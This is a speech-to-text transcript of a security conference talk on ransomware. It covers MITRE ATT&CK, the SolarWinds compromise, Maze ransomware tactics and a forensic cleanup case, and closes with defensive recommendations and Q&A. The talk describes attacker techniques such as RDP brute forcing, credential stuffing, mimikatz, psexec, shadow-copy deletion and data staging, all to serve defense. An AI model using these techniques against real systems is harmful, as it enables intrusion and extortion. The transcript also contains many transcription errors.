Ransomware: The Real Pandemic

excited to introduce jeremy and siobhani i am going to go ahead and go through uh the introduction in jeremy's bio so jeremy resmuson is the chief technology officer of abacode a company providing managed security and compliance advisory services to businesses across all industries he is also the adjunct professor at the university of south florida and founder of the usf white house computer security club since 2000 he has sought courses in cryptography and network security ethical hacking digital forensics investigations mobile and wild securities for 25 plus years he has performed r d of cyber solutions for government and commercial customers jeremy is a cissp and certified ethical hacker and he was named 2017's tampa bay technology leader of the year

so very excited to have jeremy here today to speak with us on his talk ransomware the real pandemic and with that being said i'll go ahead and let you take it away jeremy thanks wilfredo um hope everybody can hear me okay i'm very excited to speak here again um i think this is my fifth year speaking of besides tampa bay um definitely going to be a different situation this year than usual i think we had almost a thousand or more people last year in person right before the pandemic really started hitting so that was kind of the last big event i attended before before coving struck but uh you know covet has been bad it's

been a change it's it's been it's caused a lot of issues but uh i'll tell you what the real real pandemic out there from what we've seen is ransomware because we've just seen it hit so many companies um we can we get about a call a week now uh to come in and um try to clean up and unfortunately those are you know not managed services customers of ours i'm i'm cto of avocado which is a company that does manage cyber security and compliance programs for companies and uh they you know we we know that you can't find enough people you know qualified people to do this work and to hire a whole team to do it would

take you know probably six or eight people and most you know mid-size enterprises can't afford that so we try to put together solutions you know um to manage something as an outsourced program for somebody and become just a part of the team really um and so we you know our managed services customers knock on wood you know they don't get hit by ransomware because we're going to try to see something and stop it before it becomes a real issue but the the companies that don't have it in place that's kind of what i'm going to talk about is some stuff we've seen over the last year specifically around maze ransomware and some other strains the types of uh

ttp tools techniques and tactics or procedures whatever there's different way you can call that that acronym but um the way that these these um attackers are behaving and causing mischief and uh hopefully give you some information that we will you know you'll be able to use in your environment to to lower the threat lower the risk of getting hit by some of these really bad attacks so having said that let's advance to the agenda i i'm gonna make sure you guys see um

so jeremy we did lose you for a second uh if you're trying to see your screen i'm not seeing it at the moment all right let me try again

how about now see that awesome again thanks for joining me um we're going to talk about today uh the mitre attack framework which is a way of um now analysis and analyzing the um ttp of our attackers you know the adversaries that are out there we're going to look at the um the changing landscape over the last year i do want to mention you know some things about the solar winds attack because it's been in the news lately not necessarily a ransomware but we're going to apply the miter attack framework principles to that and then apply them to the maze ransomware itself and show you what happens during a forensic cleanup and investigation um which is

unfortunate you know for those companies that aren't proactive and don't have the protections in place these are some of the things that can happen and this these are the steps we take to go through and uh clean up um and then you know give you some advice on stuff you should be doing right now so let's dive right into it the concept of an attack kill chain has been around for um more than a decade i think lockheed martin was the first ones that came up with it you know in military terms a kill chain is find the target you know reckon order the target destroy the target from a cyber standpoint we're looking at

these are these are the typical things that a an attacker will do and we can um kind of key on these indicators of compromise and stop stuff before it becomes a real problem in the environment and so um miter corporation which is a non-profit you know government think tank type company came up with this uh you know very detailed list of um what i would say to our tools techniques and tactics or uh you know um some people say they're called uh let's see techniques tactics and procedures i don't know the acronym changes depending on whom you ask for how our adversaries behave and i remember going back to like 1999 2000 i was reading um hacking exposed like

the first edition and it talked about this is the methodology that hackers use you know reconnaissance trying to find the uh you know more information about the target you're going to go after and then you know finding some kind of vulnerability to exploit you know gaining a foothold um you know and then moving from there lateral movement pivoting escalating privileges and and you know doing your mischief and that really hasn't changed that much but what they've done is they've they've really looked at some indicators of compromise associated with those types of things on the kill chain so that we can the game is for us as the defenders as blue teamers to try to stop the kill chain stop these

activities as early as possible up there towards reconnaissance and resource development and before even before initial access but but maybe even after initial access happens we don't want to get to the ex execution and persistence and privilege escalation stages we want to stop it because down at the bottom of the kill chain is impact and that's when um the attackers are disrupting your business and operational processes and it's really too late by that time they're encrypting files they're demanding a bitcoin ransom and all that stuff there has been a little bit of criticism you know interesting to note that um of actually having reconnaissance and resource development up there in the top of them of the chain

because like what can you do about it right and i have this certain you know perimeter that i'm trying to protect or you know this this concept of my my environment what could i possibly do to limit reconnaissance well there actually are some things you can do um you can train your people not to give out information right right then make them empower them to be the first line of defense through cyber awareness training don't speak to people on the phone and give out data don't uh give it out over in uh you know email uh respond to phishing attempts and stuff like that um in term in terms of them gathered you know marshalling their

resources to come after you i don't know if there's that much we can do we can always try you know from a law enforcement standpoint to to disrupt the um you know international supply chain for these hacking groups but as i'm going to show you later on they're very organized very well organized they even have you know like affiliate programs now and and have their own red team you know threat hunters and so forth it's really amazing how organized and business-like they are but just looking through the rest of the chain you know initial access is where the attacker is gaining a foothold in your environment and we'll talk about some of the those initial infection vectors that

they typically use execution is trying to you know remote execute code to you know spawn a process uh you know set up a keystroke log or scrape memory for passwords things like that persistence is really a back door a covert channel so they can get on later a lot of times we'll find an attacker will exploit some vulnerability to get into a system and that and then they'll fix it so that nobody else can get in because now that system belongs to them it's their system and so but they will set up a back door for themselves so they can get in later through you know normal account login uh privilege escalation is the idea that

you know you don't want to just be an unprivileged user you want to have root level or administrative level access so you can do more especially if you have like domain admin you know it's game over right you can do whatever you want you can insert a root kit down at the lowest level that is maybe even under the operating system so that the you can forge back results to any antivirus or you know endpoint protection that's running and and lie to it about what's what you have there so uh you know if you have that level of access you have you have the keys to the kingdom the only way to get rid of somebody when

they have that is really you know like a low-level format and uh reinstall the operating system from from you know reinstall files from backups it's sad to say but that's that's what has to be done um uh discovery and lateral movement and collection is all uh moving around looking for things and you might ask yourself you know what are what are attackers looking for well in my experience um a lot of these attackers are looking for product plans um five-year plans strategic plans they're looking for stuff out there because like you could hire a group of r d people to to come up with a new product that's going to cost a lot of money and

a lot and you know sometimes it comes to nothing right you spend hundreds of thousands or millions of dollars on developing a product and never really comes to fruition or you could hire a couple of hackers for you know a few bucks who will go in break into that system and steal all their product plans and then you have access to those without having ever had to pay for the r d so you know other nation states like russia and china and these other ones are really into that idea of just stealing data they don't really actually see it as a as a um a negative thing they see it as a positive for their country

that you're they're gaining you know this data this intelligence for them you know everything's fair game that they can hack into um command control there's always going to be some connection out to some external site that's gonna that's you know can allow this remote person that has access into your system now to um issue additional commands and you know gather data there's gonna be some staging of data before exfiltration so a lot of times we can see seven zip files and raw files and different types of caches of data that are getting staged to be sent out and then exfiltration is you know how do they get that data out and some if they know that you're not really

looking if they know that you don't have the capability of surveillance on your own environment which i would say you know a good portion of companies do not uh don't even know what's going on on their networks i mean you know for example we get hired to come in and red team or pen test a network and uh you know we're gonna come in you know kind of stealthy unannounced after hours you know obfuscate our methods and and very quiet slow low and slow as they say and a lot of times they won't pick up any of the activity they're like hey we're gonna start the test and we're gonna be we're like we're already finished with

the test and we have a domain admin so the test is over um but you know that because they didn't have that they didn't know what they didn't know and that's that's the issue so a lot of times uh these attackers don't really care if anybody sees what they're doing because nobody's looking and so they'll just be as noisy as they want to but other times they know that there's some sophistication there there's some monitoring capability and they'll interleave data to make it look like regular traffic going out of the network and so that it can't be detected as easily and of course as we talked about before impact is the idea of you know doing

something naughty um encrypting all the files and demanding of bitcoin ransom or you know threatening to docs docs the files out there to the public um as you know we've gone through a lot of changes over the last year i get i mean this whole idea of a um you know the pre-covered view being this kind of castle that you're guarding and this protective perimeter that everything traverses through the firewall that's a little bit of a pie in the sky notion anyway for the last few years right as we've been migrating to the cloud you're using software as a service uh you've got mobile and you know wireless so the perimeter was already kind of fuzzy

but especially now so that everybody's working from home um people are outside the you know traditional protected perimeter imagine like how much you accomplish on social media um we use you know linkedin for hr and hiring used uh twitter for you know help desk support his facebook for you know public relations instagram so you're like running a good portion of your business on social media but are the is that cumber coming under i t security visibility and access control probably not it's probably being run by like the marketing department or whatever and those people are typically you know security amateurs we did a um whenever we do an assessment for you know for an organization we first

need to take stock of where all their important critical data are right and so i'm just thinking of a we did a professional sports team i won't say who it was not in tampa bay with some it was another one a very you know uh prominent you know billion dollar organization uh professional sports team and the first thing we did is you know try to find out where all their data were and so they're using a sas system for payroll one for finance one for ticketing crm customer customer relations um baseball analytics like i gave kind of way what what sport it was uh they had yeah they had brought in some guys from google to do analytics

for them and so like everybody else was on office 365 and uh azure and these google guys like google stuff so they're on gc suite and uh google cloud drive and so like like finding out where all the data were and who had control of it and what was the you know what was the status of status of multi-factor authentication almost impossible the i.t oh they even had these tenants on their network from outside vendors and they weren't even part of the network but they had domain uh rights and domain access and and emails and all that stuff so like just like oh the funny thing was they didn't even know if their ticketing system was

on premises or in the cloud we had to like find it so it's funny that these these um big multi-billion dollar corporations sometimes don't even know where their data is to start with so you got to find that understand how to you know protect it and all that uh and a lot of times it's not out it's it's not where you think it is and it's not being protected the way you think it is so we have this whole idea of the zero trust now it's not just a buzz phrase anymore the new normal is assume that you have a breach like somebody's already inside your network and how do we limit what they can get access to and

you know put segment them off uh apply authentication everywhere and limit their their ability to get to important data it's like the uh the whole idea of um the navy builds ships knowing that they have to reach their destination even if they have a leak so um you can't keep every drop of water out of a ship but um but it still has to go where it needs to go that's the idea of our new you know post code world um there's there's gonna be somebody in your organization that's not supposed to be there how quickly can i figure out that they're there eradicate them you know and correct that problem so it doesn't happen

again so um looking at the solarwinds attack from a miter attack framework perspective there's some really great write-ups on this done by you know fireeye and crowdstrike and some others and they came to realize that it all started with this sunspot malware which actually infected the build environment of solar winds so it established persistence with scheduled tasks that triggered a bhutan very familiar with that through our miter attack framework because persistence is one of the first things you do it uses stealth you know through encryption methods to hide its source code and hide any logs it was very clever because they would monitor and inject any like running process of ms build.exe which is a visual studio

build process so they would whenever a build was getting ready to kick off for the orion software they would uh scan for that and inject their trojan horse in there and also they disabled like debug warnings during the builds so that they couldn't see if there was any errors thrown or warnings uh it couldn't that caused by their trojan the build people you know the devops folks couldn't see it so it was very very stealthy clever how that went in the point of sunspot was to um was to put in place sunburst which was a very this is the if you want to really read an incredible write-up um you know fireeye in in i think

you know to their credit solar winds fire fire eye uh crowdstrike and all these have been open about information sharing because this is such a widespread attack and they wanted to make sure everybody you know had as much information as possible they gave very detailed information down to the you know guids and processes spawned and all and network connections out exactly how this thing behaves so we can see but the whole point of sunburst was really to um to allow additional um reconnaissance command and control uh things like that the various things that we we see in the attack attack chain right the kill chain um teardrop and raindrop were really you know different versions of droppers that were put in by

sunspot to allow them to just put in uh a post-exploitation framework if you're not familiar with cobalt strike bacon it's a it's a for-pay version of a pin testing framework like metasploit framework but there's like a million cracked versions of it out there on the dark web so they just use some you know trojanized version of that and it gives you all kinds of great you know remote access uh capabilities command execution keystroke logging file transfers privilege escalation etc so that was the point of all that is to as a dropper for um this explain framework but my question is what was the initial vector of attack i've researched this and i have not found

anywhere online and if you can find it you know put it in the chat or you know submit it through a q a or whatever um what was the initial vector of attack that allowed the attacker to insert the sunspot uh trojan into the build process in the first place i haven't nobody's admitted to that or how that came about my guess is it probably wasn't very sophisticated it was probably along the lines of what we see with any of these attacks like if they don't have a great surveillance capability with a sim a security information event management solution and 24 7 you know eyes on glass people watching for certain types of attacks they may have missed that

initial dropper that allowed them to infect the build environment you know the sad thing about all this is when they put out these builds they were signed with the solarwinds certificate so if you're a solarwinds customer you were getting signed software that was supposed to be trusted software from solarwinds but it came to you trojanized and you know and full of uh cobalt strike trojans all right well let's apply the miter attack framework to uh maze ransomware and before we do what do you think the initial vector of attack is most often i'm going to put a little poll here uh in our chat what do you think the initial vector of attack is most often

for ransomware and and i my answer comes from empirical observations things that we've seen um in our own work um over the last couple of years what do you think

a lot of people guessing fishing in social engineering and that's that's kind of the conventional wisdom and that people are the weakest link but i have some news for you this is my own research and and this is born out by groups like cove ware and some other ones that do ransomware negotiations sixty percent of uh the attack vector is is remote access remote desktop misconfiguration thirty percent through um phishing social engineering and then ten percent of like missing patches misconfiguration so i've seen remote desktop port 3389 used in dozens of successful attacks you know it's great for allowing you know quick access to files opening applications troubleshooting problems if you're an admin you know it's it's awesome but if

not configured properly that can be really in you know opening the floodgates for adversaries to come in and i should mention i'm not just talking about windows rdp i'm talking about any third-party software that allows access for example um log me in teamviewer remote pc zoho assist connect connectwise control uh oldsmar exactly over super bowl weekend and oldsmar there was somebody on the night shift watching the water treatment plant and then they saw the cursor moving on the screen and they started um it just started moving and somebody started clicking on things with teamviewer now that might have been a normal occurrence of their it department except for maybe a couple of things it was the middle of the night

uh you know that doesn't mean some i.t people i gotta i got an email from our rit person at four in the morning so that doesn't matter weird but uh the other thing was that user was changing the sodium hydroxide levels of the water supply to 100 times the normal amount okay so yeah that's bad they're poisoning the water this is horrible so obviously a few things here you don't want to be ever having your industrial control systems or scada systems connected to you into the system that can allow robot access but looks let's look deeper how do you think that attacker gained access to the team viewer in the first place well um i think

you would have to say that you know it's probably not very sophisticated a lot of rdp abuse comes through just simple brute force password guessing on an internet exposed surface service i mean really yeah an improperly configured service that allows unlimited attempts starting with no password password equals username password equals password or whatever if you've ever done any red teaming or password cracking you know the drill right you try a dictionary attack or a word list first and then a hybrid attack where you're spelling things backwards and forwards you're adding a you know a number and a question or an exclamation point at the end or whatever you might have rainbow tables which are you know hashed versions of

certain lengths of all passwords but in looking at online um you know malwarebytes said that this kind of script kitty level attack of you know just brute force password guessing is continues to be on the rise you know and another thing they do is is called credential stuffing so here um you find a valid set of user id and password combinations usually stolen from some other data breach and then you try out those combinations on other systems which is exactly why obviously you should never reuse a password anywhere across you know multiple accounts um just an example my company abico was doing what we call proof of value where we deploy our solution for a customer to show them you know we get

them hooked on the crack you know we'll give it to you for free for a few weeks once we you realize you can't live without it then we'll start charging you that kind of thing um but we um deployed this sim if you're not familiar with sim security information event management it's the type of software that collects log data from your your firewall your network infrastructure your servers endpoints cloud sas you know api connectors anything that you can syslog or you know pour all this into one aggregation server then you run all these correlation rules on there something like 30 000 pre-configured rules looking for indicators of compromise um with the constantly updated threat feed so when

things like you know the exchange server bugs which we saw a few weeks ago come out um you'll immediately get you know an update on there and then of new things to look for and then you have your analysts looking at this you know eyes on glass 24 7 and popping up these alerts and then running them to ground making sure they're they're handled um within hours of deployment of the solution we saw that um somebody was pounding on you know rdp port 3389 uh from russia and we were able to tell them you know hey you know we need to fix that now the the alert from the sim just says brute force password guessing attempt on

this box coming from this ip address but what's the deeper issue there is why why are you not you know limiting the number of login attempts why are you not whitelisting that to the you know to just one trusted ip um and you know all these other things your layers vpn you want to go you know push this through a bastion host and all this stuff we looked at this the deeper security architecture issues and try to advise them on that stuff so maze is especially a pain in the buck but from a from a business point of view because the people that run maze are really good business people starting back in 2019 they really they

they're the ones who kind of um began to use some novel extortion methods it's funny if you look at their posts um they're in russian but you can find them out on the dark web and places and they're you know very opal open like social media posts uh translated to english they call their victims clients right which implies that they think they have a contractual relationship with these uh victims or clients um so they deliver on their part of the agreement which is encrypting all the files and then they expect their clients to deliver on their part which is paying the ransom and so you know not only are they going to try to get a ransom to

uh selling you the decrypt key they're also going to threaten to dox you right they're going to publicly release all of your stolen data out on dark web um they're not going to be quiet about it like they'll go if you don't pay they'll go very public with the details about the compromise they'll show some documents as proof um they some cases they even threaten to tell the securities and financial regulators so like think about that if you're privately or i mean it's your public public traded company and a word gets out that there's been a breach you know that can your shareholders can rise up against you and sue you and things like that so this allows them

in some cases to get multiple extortion fees and they have this it's incredible to have this affiliate a program where they'll pay pen pen testers and red teamers to find exploits you know like maybe up to forty percent of the ransom now if i if i'm a pen tester how do i know i'm really getting paid 40 of the real ransom or they're not just giving me like x you know and they and when they advertise it's funny when they're recruiting they're like no slackers or scammers we want people who are dedicated oh and by the way they try to say the maze maze group at least uh says that they don't go after schools hospitals

airports or government just just you know greedy american corporations but you know who knows and sometimes they even do try to pay off insiders to to get you know um you may have read about there's a tesla and this wasn't the maze group but this is another group there's a tesla employee who turned down a million dollars to to plant malware in the tesla manufacturing plant so they do sometimes try to get you know recruit insiders all right so some of the stuff you might see from maze is uh it does establish persistence through um a startup folder um batch file it does try to disable like ida ida pro and other types of tools that allow you

to do malware reversing and analysis it does do credential stealing through launching mimikatz if you're not familiar with mimikats it's a it's a great tool that allows you to scrape basically plain text passwords out of ram um it uses uh ps exec and powershell to move laterally so once once you've gotten like one user id and password that's a you know privileged admin level you can just ps exec to other systems to to spread the you know the infection there command control is actually using hard-coded ips via http that's really not that sophisticated right i mean that should be something you could easily look for if you know the domains to watch for on a you know on a block list but of

course they change them you know so frequently it's hard to keep up um that you know they're they're registering you know hundreds or thousands of domains a day um for data collection and exfiltration they're often using 7-zip and when scp so they're staging they're looking for important data sensitive data personally identifiable information financials product plan stuff like that ip and then they're um zipping it and then they're going to use some kind of sd win scp or something to send it off to some you know cloud resource from an impact standpoint it is you know they're trying to clean up their tracks they're making as hard as it is as they can for you to uh recover by

deleting shadow volumes stopping the sql service so they encrypt databases and stuff like that it's really pretty horrible well uh we're afraid of how much time do i have left i have to know how quickly i should speak here so we want to leave some time for questions um i would probably give it about 10 more minutes thanks very much perfect um yeah last year i was getting i was doing a talk on uh post-quantum cryptography and i got so much into speaking about quantum computing that i left like five minutes at the end to actually talk about post quantum cryptography so i don't want that to happen this year um so this is um

this is uh a little like program campaign that we've we've been running um whoops sorry pull that over here uh i basically i i wrote a um a document about um what it looks like to um sorry i'm pulling this up right now what what it looks like to run a um a digital forensics and instant response uh session and so um what i'm gonna do is kind of walk you through that hold on one second

apologies i got my my notes mixed up well you know what i'm just gonna i'm gonna wing it here so you guys this is live without a net i don't have my notes available but i kind of know how this thing runs so the first thing we do is usually we get a call about um i don't know four or five in the afternoon because what happens is they they got hit with ransomware they see a message on their computer when they came in in the morning they probably got hit about midnight and they come in um you know like 8 a.m and all their files are encrypted and uh and by the way this this ransomware

their maze ransomware is very cheeky you know they're like they tell you what you did wrong and like yours your security sucks and you're just gonna have to live with it now you're gonna have to send us a bitcoin ransom to get your files back and every single file that you have you know is going to be turned into you know uh an encrypted file and they're going to leave these little text files around you know with this with this warning or you know this chatting you really really it's irksome because they're they they're like you know you should have training for your people so you don't click on links and stuff like that um but you know with their help not so

helpful uh security advice anyways they um uh you know we'll get the paperwork signed right away nba msa and all that stuff because we always you know wanted to sign our t's and cs before we get started on a d4 cleanup um and we'll come to find out usually that they have been probably working on this themselves all day running around with your hair on fire because they didn't have any incident response plan and they didn't know what they're doing and they didn't know who to call uh in some cases they've already called a company about doing a negotiation and they got a bit like in this case i'm i'm conflating a bunch of stories

together here of things that happened actually within like the last six months uh but i should you know i'm not going to give you any details on who they are to protect the innocent or i should say that the victims um but but the details are real um so in this case uh this company uh does manufacturing and uh production and shipping logistics uh of certain products and by the way if you look at the maze ransomware attack vectors it's across the board but they do hit a lot of manufacturing operations because they know these guys are not usually very sophisticated from an i.t standpoint they have a lot of ot operational technology and it's pretty easy to hit

them and um and get them to pay because they'll be completely shut down they can't ship product they can't receive payments they can't do anything until they until they get um you know unstuck from from this ransomware situation so in this case this is exactly what happened these guys their financial system was on this uh some kind of oracle crm or financial system and they thought they were backing it up to the cloud they weren't as they say the schrodinger's law of backups is a backup is on it this state of a backup is only known until you you know when you try to do a restore and in this case they realize they weren't actually doing what they thought

they were doing and the only backup they had was going to a nas locally and so the nas also got encrypted along with the primary so they had no nothing they had no financials going back for like two years uh unfortunately so they were dead in the water and they had already reached out to a company about paying a ransom and uh the attackers were asking for two million dollars initially for the ransom and these guys were offering uh two uh 500 000 so they they were like what the heck you know we're fairly small manufacturing operation here uh we don't want to pay that and you know i don't we don't know what we're doing

so they got in touch with us and this is typically what happens we get brought in at the end of the day after they've already tried all day and got nowhere and so uh you know always makes your spouse real happy when you start on a project at seven or eight in the evening that's when you're starting on the thing and then it kind of goes all night from there and you're doing you're doing activities and trying you're trying to clean up you're segmenting off systems you're turning off systems you're changing passwords now in the olden days when i taught forensics initially digital forensics at usf probably 10 years ago conventional wisdom was uh pull the plug

uh yank the hard drives uh copy the hardware you know do a bit stream level copy of the hard drive and then work off a copy that's kind of old school because let's face it the goal of of forensics now is not um is not prosecution because these people are coming in from russia and um you know north korea or whatever iran we're not going to have any reciprocity from a legal standpoint we're not going to bring them to justice so attribution really not that important protecting integrity of the data not that important really anymore what we want to do is find out what happened fix the problem make sure it never happens again and help them remediate

okay so that's usually the goal now so um in this case um we got involved in it and so we started looking at the thing and there's three possibilities of how they got in now we don't think it was fishing because we can look through you know um o365 logs and see things like that we can see if rules were created we could see if people uh were logging in at odd times from odd places and we didn't see any of that but what we did see is um they did have some deprecated servers they had an exchange server they're running um even though they migrated office 365 in a cloud they were still running in

a deprecated version of exchange because their crm system needed to use that to send out messages okay i don't know why it needed to do that i don't know why they couldn't have a connector to it to an o365 account whatever they just didn't know how to do it and this this is the case sometimes you just don't have you know savvy i.t people that know where they're doing um and then the other issue was uh they were running you know we've seen this numerous times uh there have been a company store that they had like logo and promotional items polos shot glasses uh t-shirts and stuff hats where they were it's they're running it

on their they thought it was on the corporate intranet but it was really exposed to the public internet and it had this um 1990s era you know php code for it for a e-commerce system they're running and so somebody came in and like was able to open that thing once they get a foothold there either through the deprecated exchange server or the phone like web services then they pivot from there into other parts of the system all right so it just kept going on and on so what we immediately do is we deploy a solution that allows us to um gather compromised information so we can see um you know we look through registries cat

memcache um you know drop files network connections and all this stuff we we're able to gather that ephemeral data now because we want to know if somebody is still actively attacking them if we look in memory we can see if many cats is there we can see if other like password scraping software and stuff like that is still resonating in memory that will tell us for sure you know that there's an active attack going on we can also see the stage data as i was saying you know the part of the miter attack framework is the collection and exfiltration we can see the stage data with the zips you know the the rars the seven zips and we can see

the um the ftp you know sessions out you know that that if we can see if the horse is already you know bolted out of the barn all that stuff we can see um let me fast forward to the to the end of the story so we we did engage we had to engage with a third party to to do the negotiation with the hackers you always hear these guys have great customer service because they're like they're real concerned about their reputation and they don't want anybody to think that you know if they pay they're not going to actually get the key and all that but in some kind you know their their customer service is greatly overrated in

my opinion you know so we've gotten uh you know like we had to actually find them we the the email address they gave us didn't work it wasn't you know we weren't getting any response and finally because of these this group that we work with they were they knew somebody else within the maze ransomware group they were able to get in touch with them and finally were able to open the negotiations um it went back and forth they made an offer of uh like 750 000 um what you can do is you can say i don't need all my files decrypted i just need this one server decrypted and they'll and you can pay less for that i think this

company ended up paying like 425 000 or something like that to get in think about this working with these negotiation groups negotiation groups the one the one we work with is all former law enforcement guys um they um they do a conflict of interest validation check with each thing because uh homeland security or maybe his justice department last year came out with this thing saying you can't you can't negotiate with ransomware groups because you're gonna you could be sponsoring terrorism right but there are certain ones you're allowed to work with that aren't that aren't states sponsored terrorism or whatever so anyways you have to do all that but i always wonder if the negotiation group uh

is in cahoots with the attackers by saying um yeah uh victim you give us uh five hundred thousand dollars and we'll you know get your decrypt key but then they go work with the uh attacker and they get the thing down to 400 000 and then they pocket 100 000 themselves nobody would ever know it's a completely unregulated industry so all this could happen so long and short you don't want to find yourself ever in this situation of having to go through digital forensics investigation cleanup for the reason i said before you're probably gonna have to end up um uh you know rebuilding your entire environment deleting everything uh low-level format of all your disks

restoring from backups oh by the way you may not have enough like virtual uh space available to to do the decrypt right if you're if you're decrypting all of your servers and files you need an equivalent number of of memory and storage available for those and you may not have that available in some cases we have to cobble together you know a little nas from servers and and uh and backup storage to be able to do that all right so wrapping up here's the stuff i recommend you should do uh now is um ensure that you you know you're not a victim by having uh adequate access controls in place with multi-factor authentication let's see white listings so you can only

access remote access from from trusted locations don't have so many admin accounts i've been we did an insurance company pentest and i found that it had like 238 domain admin accounts like why do you need that many you shouldn't have that many um you should have very few and they should be you know heavily uh regulated vulnerability management um you can't actually turn on network level authentication that will makes people um authenticate to a remote desktop session before they establish uh a real session that will keep you know cut down on the idea of a denial of service attack from brute force password guessing training to empower your users segmentation all that stuff you this is

all the stuff that you really need to have in place and then if you're looking for it to monitor here's some here's some kind of novel things that i would say look for any kind of uh privileged use any kind of dropping of metasploiter or cobalt strike beacon or metaphor any other kind of exploit frameworks um privileged use of ps exact power shell and any of these other tools that are often associated with malware and with ransomware and then um here's here's a little one for you uh get user default ui language function is a command also always associated with maze range and somewhere because they are attacking from another country and so they're going to call this

function to see where they are what language is being used um no typically a and i don't know if you have any software developers here but typically you wouldn't use that that function in if you know if you're if you're developing in english for english speakers this is this is kind of a giveaway that this is a remote attack all right a lot of information there i'm gonna be quiet and see if we can answer a couple questions perfect and i think we actually have uh some questions uh paul do you want to cover those questions well i'm gonna just go ahead and look at the the top ones in the list they're coolest ransomware and

increasing use of red teaming tools by ransomware groups i mean yeah it's it's an alarming trend but it's also to us it could be a method of detection right all i have to do now is look for um a signature of of a cobalt strike or a metasploit framework and and the use of that can i can i can have either application whitelisting or i can look for um you know spawn processes or things that are associated with it now of course if they build a custom version of that from from source code that i can't do a signature based you know search for that based on a hash or a file signature but what i can do is look for behavior

that's indicative of what cobalt strike or what meta metasploit do and and you can certainly um you know all the modern endpoint protection like a you know silence carbon black uh crowdstrike um sentinel one any of these are gonna have that capability to look for bad behavior versus just signatures you know um any other questions let's see i think i think ransomware has not you know run its course yet it's still it's still around it's still a pandemic issue for us right now we're still getting calls like all the time um so i don't see it going away anytime soon as long as people are still paying and you know so it's me i have not been

in the negotiation table myself we always bring in a third party to do that so um that's why that's why i'm leery of those guys and i still have have my suspicions that they're working together with the uh with the attackers so jeremy there's a question here that i think is good uh for everyone's sort of awareness but they're asking advice on how to communicate this issues to clueless leadership uh you know sometimes there's that balance of not being able to talk to your leadership about these issues because they just truly don't understand how do you bridge that gap yeah most of my job is education of of uh c-level people on the on this issue

and they have to understand that you know cyber security is a business issue first technology second um if you ask me how are you doing on cyber security typically they're gonna reach out to their it folks and say hey how are we doing and guess what those people a are not probably security experts like usually right or or they're wearing multiple hats they've they've got the responsibility for it and it security so there's no separation of duties there there when i teach at usf i don't let students grade their own papers right for a good reason they're going to all give themselves a so if it is checking its own work that's a problem there's no separation

of duties so we try to try to frame it for them that way is you really need another set of eyes checks and balances you need this third party team to come and watch what you're doing to do the monitoring i've probably done more than five or six hundred audits myself over you know for the government and um commercial customers and that's the one thing i usually see missing most of the time is visibility into your environment without the visibility you don't know what's going on you can have all the other protections in place uh firewalls endpoint protection training for your people policies and procedures but if you don't have eyes on glass monitoring of what's going on

you can't say for sure today if somebody's inside your environment and how bad it is so that's uh that's my two cents on that yeah that's great um i think we have time for probably one more question uh and there is a lot of interesting questions but one of the ones that i thought was interesting is what are your thoughts for the next two to five years on the ransomware issue and thoughts on cyber insurance and how that might impact the future cyber breach insurance i think is necessary but it's not a cure-all and i would say it's it's fast across to think that you're going to go get cyber breach insurance and that's going to

keep you covered you can't even get the cyber breach insurance unless you have some level of due diligence in place and guess what they won't pay out on a breach if you weren't doing the things that you said you were doing uh you know to even get the policy in the first place plus we've also seen some situations where they won't pay out if it if you if it looks like what was done was perpetrated by a nation state because then that's considered an act of war and they get a clause that they don't have to pay if it's an act of war so cyber breach assurance i think is great to to um as a safety net uh to to cover anything

you made a mistake with you were really trying to do the right things you had the best practices framework in place but somebody made a mistake but it should it should not drive bad behavior and it should not be seen as a panacea you know for a cure-all for everything um it but but it does work hand-in-hand with best practices um next two to five years i think as i said we're i don't see any abatement of ransomware happening anytime soon because it is so successful and um think about this if these groups are making billions of dollars a year they have a great a business enterprise with affiliate programs uh threat hunters red teaming you know a

great um organization of you know separation of duties in their organization if they took a little bit of money that they made off the ransoms and poured it back into r d themselves just like you know regular company would just let's just say five to ten percent they could come up with some great tools and um practices that are even more advanced and and more effective to be able to to um sidestep emerging defenses right so i think we're probably going to see that you know right now we up till now i haven't seen any like really smart you know ai based vulnerability you know probing and bots you know bots or worms or anything like

that but i think it's on the horizon um you know computers are pretty good ais are pretty good at crunching numbers and um finding low-hanging fruit in terms of vulnerability um they're not as smart yet at finding complex ones but there's enough um i think we've been pretty clear about this you don't have to be that stealth you don't have to be that smart or that clever to get stuff by most people if they're not watching which a lot of companies are not so you gotta have the visibility but i think the future we're gonna see is you know attackers will get smarter by uh pouring r d money into ai and other things are gonna help them

sidestep some of the defenses that we have in place now okay thank you so much uh i think that covers all the questions um i think you have a few more moments we could probably wrap this up and uh thank you so much jeremy for coming to speak with us today and uh that's all i got for now thanks everybody for joining um i'm gonna i i think we're i think we're part of a uh scavenger hunt but if not um i'm just going to put my website there in the blog section of my website there is a ctf mini challenge um the per whoever solves that first and it's it's fairly difficult i don't know if you've ever

um there's a little bit of a forensics challenge there if you can solve that we will send you a prize for that so go to that website and in the blog section of my website there is a seat a mini ctf challenge all right have fun